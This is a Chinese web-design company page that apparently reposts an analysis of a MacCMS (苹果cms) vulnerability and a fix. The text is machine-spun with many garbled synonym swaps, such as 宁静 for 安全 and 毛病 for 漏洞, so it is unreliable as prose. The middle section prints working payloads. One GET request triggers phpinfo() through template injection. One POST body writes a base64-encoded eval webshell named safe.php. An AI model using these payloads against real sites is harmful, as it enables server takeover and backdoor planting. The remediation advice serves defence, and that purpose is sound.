商丘做网站,商丘网站优化,商丘网络推广,商丘网络公司
当前位置:首页 > 新闻资讯 > 建站经验 >

「安阳县网站建设」苹果cms网站漏洞修复解决办法

发表日期:2019-04-25 08:29聚圣源浏览次数: 本文关键词:安阳县网站建设,苹果,cms,网站,漏洞,

 

苹果cms体系,是现在许多影戏网站都在利用的一套网站体系,开源,免费,扩展性较好,支持一键收罗,伪静态化,高并发的同时承载,得到的许多站长的喜好,于克日被网站宁静检测发明,maccms存在网站毛病,sql注入盲射获取数据库的治理员账号暗码,关于该毛病的详情,我们细致阐发看下.

maccms毛病阐发与修复

苹果CMS接纳的是php语言开辟的代码,利用的数据库是mysql范例,这种架构是比力常用的,也是比力稳固的,但是在宁静方面出现的题目是比力多的,这次发明的是sql注入毛病,在网站的根目次下的inc文件里的module目次下的vod.php代码如下图所示:

「安阳县网站建设」苹果cms网站漏洞修复解决办法

代码里的empty($wd函数,在举行判定假如是,大概不是的逻辑历程当中,会将前段用户访问带来的参数,举行宁静过滤,我们跟进代码来追寻到苹果CMS的设置文件,在function.php设置文件代码李看到对网站的全部哀求方法包罗get、post、cookies的提交方法都逼迫性的举行了宁静转义。网站毛病题目的产生就在这里.

我们细致又发明,maccms利用了360宁静提供的防备sql注入拦截代码。360的防备sql注入是好几年前开辟,并公然在网络上的,已经好久没有更新维护了而且还存在sql注入代码绕过的环境,参数值之间举行实体转换的时间,360的sql拦截规矩没有对空缺符以及反斜杠举行拦截,导致可以绕过插入恶意参数,直接哀求到苹果cms后端数据库中去,获取苹果CMS的治理员账号暗码。

「安阳县网站建设」苹果cms网站漏洞修复解决办法

我们来看下怎样使用苹果CMS的毛病,从上面毛病产生的细节里可以看出,是由于拦截sql注入语句的历程中存在可以被绕过的毛病。我们来利用%0b,以及空格对代码举行注入,sql语句在拼接中,可以插入反斜杠举行单引号的报错,从而绕过苹果CMS的宁静拦截。语句如下:

GET哀求:

http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}

可以直接看php的详细信息

POST延安哀求

可以直接获取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST内容如下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

「安阳县网站建设」苹果cms网站漏洞修复解决办法

可以直接天生带有一句话木马后门的代码,文件名为safe.php,一句话木马链接暗码是safe.

怎样修复苹果cms网站毛病呢?

对网站毛病的修复我们要知道毛病产生的缘故原由,以及为何会绕过苹果CMS的宁静过滤,maccms利用的addslash宁静函数,sql中没有加单引号的宁静防护,in字句也很轻易忘记加引号,再一个后期处置惩罚宁静过滤的时间可以插入单引号,stripslash导致可以参加单引号,编解码导致绕过addslash,利用urldecode编码举行注入绕过,凭据上面提出的毛病绕过,我们SINE宁静提出毛病修复的发起是:对URL解码举行双层的转义,对get,post,cookies的拦截规矩举行宁静更新,增强空格,以及百分标记的拦截,假如对步伐代码不认识的话发起咨询专业的网站宁静公司来处置惩罚办理。

如没特殊注明,文章均来自网络! 转载请注明来自:http://www.jushengyuan.com.cn/news/jzjy/12925.html

网站设计案例推荐

热门文章

站长工具综合查询里面SSL证书不...

SSL证书不安全是怎么回事?但是点进去这个提示后,显示的是别人的tdk是不是被劫持或者被黑了?...

日期:2018-03-27 浏览次数:2021

简洁而实用的版权信息可增色网...

打开网站,人们自然会从上往下浏览,首先映入眼帘的一定是BANNER主视觉,然后是网站主体内容部分。相比较而言,注意到网站底部版权信息的浏览者确实不多,但这并说明网站版权信...

日期:2018-09-20 浏览次数:1898

网站设计需要注意的3点问题...

对于网站设计来讲会受到很多因素的影响,而且不同类型的网站,在设计时需要体现的元素也不一样,比如说对于一个企业网站更想体现出品牌以及产品的特点,主要是对产品、企业信...

日期:2018-02-12 浏览次数:1820

企业网站为什么要改版 改版选择...

网站改版,是每个建站企业必须面临的工作。相信也有不少站长问,已经做好的企业网站,为何还要大费周章重新进行改版设计呢?下面小编就来给大家说说,企业究竟为什么要改变,并...

日期:2018-03-26 浏览次数:1354

永城网站制作:模板建站不可不...

随着互联网建站尤其是自助建站热潮不断高涨,建站行业涌现出越来越多的自助建站平台,这些平台普遍都提供网站模板可选。...

日期:2018-04-30 浏览次数:950

相关文章

「双峰县网站建设」免费开源...

想本身建网站又没有网站编程底子的小同伴有福啦,本期小熊seo整理了海内一些着名的,而且可以开源免费下载的cms自助建站体系步伐,...

日期:2019-06-05 浏览次数:77

「沾益县网站建设」网站建设...

如今许多做网站的,无论小我私家,企业都很少会从背景到前台全新去独立开辟,都是借助现有的cms体系来搭建,海内做网站用得最多的...

日期:2019-05-22 浏览次数:61

「永善县网站建设」PageAdmin Cm...

4月,IT界的行业盛事2019互联网岳麓峰会落下了召开,会上群星毕至,大伽咸集,配合为互联网生长的将来出策划策。此中,一份《2019年中...

日期:2019-05-05 浏览次数:98

「融安县seo」网站漏洞如何修复...

jeecms 近来被爆出高危网站毛病,可以导致网站被上传webshell木马文件,受影响的版本是jeecms V6.0版本到jeecmsV7.0版本。该网站体系接纳的是...

日期:2019-04-21 浏览次数:67

「邯郸市网站建设」PageAdmin Cm...

我们做网站时间,会发明差别的网站数据有有种种差别的参数需求,如产物信息必要设置产物名称,型号,代价;而消息信息必要设置标题,内容,视频信息必要设置标题,视屏播放文...

日期:2019-03-13 浏览次数:144

随机推荐

「天津网络公司」微商城开发定...

「淅川县网站建设」企业网站建...

Web服务器、应用程序服务器、...

网站建设难度大吗?效果好吗?...

不赚钱的企业网站,即便免费又...

那些年电商购物车踩过的坑...